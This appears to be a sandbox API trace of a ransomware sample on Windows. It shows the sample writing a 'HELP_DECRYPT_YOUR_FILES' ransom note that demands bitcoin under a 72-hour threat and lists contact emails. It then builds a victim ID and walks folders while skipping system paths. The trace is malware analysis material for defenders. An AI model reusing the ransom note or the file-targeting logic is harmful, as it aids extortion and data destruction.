	[0175.412] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0175.412] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0175.415] CloseHandle (hObject=0x390) returned 1
	[0175.415] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.416] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.416] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.428] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0175.429] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.429] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0175.430] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0175.430] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.430] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0175.431] CloseHandle (hObject=0x390) returned 1
	[0175.431] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x82127c7e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8214df4a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0175.431] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\*.*") returned 89
	[0175.431] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.432] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*") returned 0x59
	[0175.432] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.433] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0175.433] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.433] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0175.433] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.434] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0175.434] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.434] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.434] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.434] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0175.434] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.435] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0175.435] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.435] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.435] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.435] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0175.435] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.436] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0175.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.436] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0175.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.436] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0175.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.437] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0175.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.437] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.437] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0175.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.438] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0175.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.438] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0175.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.438] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0175.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.439] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0175.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.439] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0175.439] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0175.439] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0175.439] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x82127c7e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8214df4a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName="..", cAlternateFileName="")) returned 1
	[0175.439] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0175.440] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8214df4a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8214df4a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x821740f4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0175.440] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82127c7e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x82127c7e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8214df4a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0175.440] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0175.440] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1
	[0175.440] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1
	[0175.440] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov"
	[0175.440] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\"
	[0175.440] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\", lpString2="RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime"
	[0175.440] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime"
	[0175.441] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\"
	[0175.441] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\"
	[0175.441] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\*.*"
	[0175.441] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName=".", cAlternateFileName="")) returned 0xfb9230
	[0175.442] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\*.*") returned 97
	[0175.442] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.442] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*") returned 0x61
	[0175.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0175.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0175.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0175.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0175.444] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.444] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0175.444] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.444] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.444] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.444] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0175.445] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.445] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0175.445] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.445] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0175.445] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.445] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0175.446] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.446] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0175.446] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.446] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.446] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.447] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0175.447] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.447] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0175.447] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.447] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0175.447] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.452] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0175.452] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.452] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0175.452] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.452] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0175.452] FindNextFileW (in: hFindFile=0xfb9230, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName="..", cAlternateFileName="")) returned 1
	[0175.453] FindNextFileW (in: hFindFile=0xfb9230, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1882aa2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1882aa2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa18a8d11, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x416, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0175.453] lstrcmpW (lpString1="Power_0.provxml", lpString2="..") returned 1
	[0175.453] lstrcmpW (lpString1="Power_0.provxml", lpString2=".") returned 1
	[0175.453] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\"
	[0175.453] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\", lpString2="Power_0.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml"
	[0175.453] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml") returned 109
	[0175.453] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.454] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml") returned 0x6d
	[0175.454] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.454] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0175.454] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml"
	[0175.454] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml") returned 109
	[0175.454] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.455] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.455] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0175.455] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
